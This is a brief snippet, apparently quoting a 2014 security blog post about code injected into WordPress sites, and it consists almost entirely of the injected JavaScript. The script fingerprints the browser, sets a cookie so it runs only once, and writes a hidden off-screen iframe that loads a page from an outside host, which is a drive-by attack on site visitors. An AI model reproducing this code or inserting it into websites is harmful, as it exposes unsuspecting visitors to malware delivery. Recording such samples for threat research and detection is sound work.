Malicious code injected into WordPress sites

1. Malicious code injected into WordPress sites
2. http://blog.dynamoo.com/2014/09/malicious-wordpress-injection-sending.html
3. =======================
4. function getCookie(name) {
5. var Smilepize = document.cookie.match(new RegExp(
6. "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
7. ));
8. return Smilepize ? decodeURIComponent(Smilepize[1]) : undefined;
9. }
10. function Pleos_Aflertuder() {
11. var r_amblartide = navigator.userAgent;
12. var Yellowgrand = (r_amblartide.indexOf("IEMobile") > -1 || r_amblartide.indexOf("Windows NT 6.3") > -1 || r_amblartide.indexOf("Windows NT 6.2") > -1 || r_amblartide.indexOf("Chrome") > -1 || r_amblartide.indexOf("Windows") < +1);
13. var Ultrastilus = (getCookie("Garamg18usality") === undefined);
14. if (!Yellowgrand && Ultrastilus) {
15. document.write('<iframe src="http://sexyunanu.inthepress.org/bububiolasa16.html" style="left: -902px;font-size: 100%;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;font-family: "Courier New", Courier, monospace;top: -902px;text-align: center;"></iframe>');
16. var date = new Date( new Date().getTime() + 66*60*60*1000 );
17. document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString();
18. }
19. }
20. Pleos_Aflertuder();